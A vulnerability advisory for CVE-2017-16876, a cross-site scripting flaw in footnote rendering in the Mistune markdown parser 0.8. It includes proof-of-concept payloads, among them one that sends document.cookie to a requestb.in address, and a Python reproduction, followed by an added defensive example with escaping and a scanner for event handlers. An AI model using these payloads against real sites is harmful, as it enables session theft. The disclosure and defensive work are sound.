DATE

07.11.2017

Affected Vendor

Lepture

Affected Product

Mistune – The fastest markdown parser in pure Python with renderer features, inspired by marked. – https://github.com/lepture/mistune/

Vulnerable version

0.8

Fixed version

0.8.1

Recommendations

Update to Mistune version 0.8.1

Vulnerability details

Alert proof of concept:

Footnote 1 link[^first" onclick="alert(1)].
[^first" onclick="alert(1)]: Footnot

Cookie exfiltration:

Footnote 1 link[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)].
[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)]: Footnot

Python example:

import mistune

# Renderer with HTML escaping enabled: the link in the first input is escaped
# correctly, but the footnote key in the second input is not.
renderer = mistune.Renderer(escape=True, hard_wrap=True)
markdown = mistune.Markdown(renderer=renderer)
print('Works good:', markdown('[asd](qwe"onmouseover=")'))
# Footnote reference whose key carries a closing quote and an onclick handler
xss = "Footnote 1 link[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)].\n[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)]: Footnot"
print('XSS:', markdown(xss))
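As an added example (not mistune's code and not part of the original advisory), the bug class behind the proof of concept: a constructed, simplified footnote-reference renderer that interpolates the footnote key into attribute context unescaped, beside the hardened form that HTML-escapes it, plus a scanner a defender can run over rendered output to flag any event-handler attribute. The template, function names and scanner are assumptions for illustration, not mistune internals.

```python
import html
import re
from html.parser import HTMLParser

# Constructed, simplified footnote-reference renderer modelled on the bug
# class in this advisory. It is NOT mistune's code: a reference like [^key]
# becomes an anchor whose id and href carry the user-controlled key.
FOOTNOTE_REF = re.compile(r'\[\^([^\]]+)\]')
TEMPLATE = '<sup class="footnote-ref" id="fnref-%s"><a href="#fn-%s">1</a></sup>'

def render_ref_unsafe(key):
    # Vulnerable pattern: the key lands in attribute context unescaped, so a
    # key containing `"` closes the attribute and injects new ones.
    return TEMPLATE % (key, key)

def render_ref_safe(key):
    # Hardened pattern: HTML-escape the key first; quote=True also turns
    # `"` and `'` into entities, which is what attribute context needs.
    safe = html.escape(key, quote=True)
    return TEMPLATE % (safe, safe)

def render(text, safe=True):
    # Replace every footnote reference in `text` with the chosen renderer.
    fn = render_ref_safe if safe else render_ref_unsafe
    return FOOTNOTE_REF.sub(lambda m: fn(m.group(1)), text)

class HandlerScanner(HTMLParser):
    # Records every on* attribute found on parsed start tags. Matching on
    # parsed attribute names (not raw text) means an escaped
    # `&quot; onclick=` inside a value is correctly NOT reported.
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.startswith('on'):
                self.handlers.append((tag, name))

def find_event_handlers(rendered_html):
    # Output check for a markdown renderer's HTML: a footnote reference
    # should never produce an event-handler attribute.
    scanner = HandlerScanner()
    scanner.feed(rendered_html)
    scanner.close()
    return scanner.handlers

# Constructed sample input built from the alert proof of concept above.
POC = 'Footnote 1 link[^first" onclick="alert(1)].'
```

Running `find_event_handlers(render(POC, safe=False))` reports the injected `onclick` on both the `sup` and `a` tags, while the escaped rendering reports nothing.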

CVE

CVE-2017-16876

Credits

Dawid Czarnecki